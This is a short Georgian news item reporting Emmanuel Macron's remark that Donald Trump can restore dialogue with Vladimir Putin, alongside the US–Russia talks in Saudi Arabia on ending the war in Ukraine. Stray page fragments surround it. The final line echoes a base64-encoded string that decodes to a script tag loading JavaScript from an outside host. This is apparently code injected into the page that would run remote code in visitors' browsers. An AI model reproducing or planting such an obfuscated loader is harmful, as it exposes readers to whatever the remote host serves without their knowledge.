tube
ავერსი jaluzi

საფრანგეთის პრეზიდენტმა, ემანუელ მაკრონმა აშშ-ის ახალ ადმინისტრაციასა და რუსეთს შორის მოლაპარაკებების შემდეგ განაცხადა, რომ დონალდ ტრამპს „შეუძლია სასარგებლო დიალოგის აღდგენა“ კრემლის ლიდერ, ვლადიმერ პუტინთან. მის განცხადებას AFP ციტირებს.

მაკრონმა თქვა, რომ ტრამპი „სტრატეგიულ გაურკვევლობას უქმნის პრეზიდენტ პუტინს“.

საფრანგეთის პრეზიდენტმა ასე თქვა, რომ - "ტრამპი მკაცრ სიტყვებს იყენებს და ქმნის გაურკვევლობას, რომელსაც შეუძლია პუტინზე ზეწოლას დაეხმაროს".

საუდის არაბეთში გუშინ გამართულ შეხვედრას აშშ-ისა და რუსეთის მაღალი თანამდებობის პირები, მათ შორის, სახელმწიფო მდივანი მარკ რუბიო და რუსეთის საგარეო საქმეთა მინისტრი სერგეი ლავროვი ესწრებოდნენ. როგორც ცნობილი გახდა, შეხვედრაზე მხარეებმა უკრაინაში ომის დასრულების საკითხი განიხილეს თუმცა უკრაინული მხარე ამ მოლაპარაკებებში ჩართული არ იყო.

73
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");